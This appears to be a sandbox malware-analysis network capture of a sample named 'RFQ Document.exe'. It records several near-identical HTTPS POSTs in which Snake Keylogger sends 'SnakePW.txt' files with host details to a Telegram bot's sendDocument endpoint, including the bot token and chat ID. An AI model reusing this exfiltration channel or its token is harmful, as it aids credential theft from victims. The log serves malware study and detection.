                                            2021-09-28 05:59:45 UTC448INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12870,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            282192.168.2.450119149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:45 UTC449OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f47b43a1
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:45 UTC449OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 37 62 34 33 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f47b43a1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:45 UTC449INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:45 UTC450INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12871,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            283192.168.2.450120149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:45 UTC450OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f490b922
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:45 UTC451OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 39 30 62 39 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f490b922Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:45 UTC451INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:45 UTC451INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12872,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            284192.168.2.450121149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:45 UTC452OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f4afb74c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:45 UTC452OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 61 66 62 37 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f4afb74cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:46 UTC453INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:46 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:46 UTC453INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12873,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            285192.168.2.450122149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:46 UTC454OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f4c78f72
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:46 UTC454OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 63 37 38 66 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f4c78f72Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:46 UTC454INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:46 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:46 UTC455INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12874,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            286192.168.2.450123149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:46 UTC455OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f4edb3a4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:46 UTC455OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 65 64 62 33 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f4edb3a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:46 UTC456INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:46 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:46 UTC456INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12875,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            287192.168.2.450124149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:46 UTC457OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f5032b33
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:46 UTC457OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 30 33 32 62 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f5032b33Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:46 UTC457INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:46 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:46 UTC458INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12876,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            288192.168.2.450125149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:46 UTC458OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f51b008b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:46 UTC459OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 31 62 30 30 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f51b008bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:46 UTC459INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:46 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:46 UTC459INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64
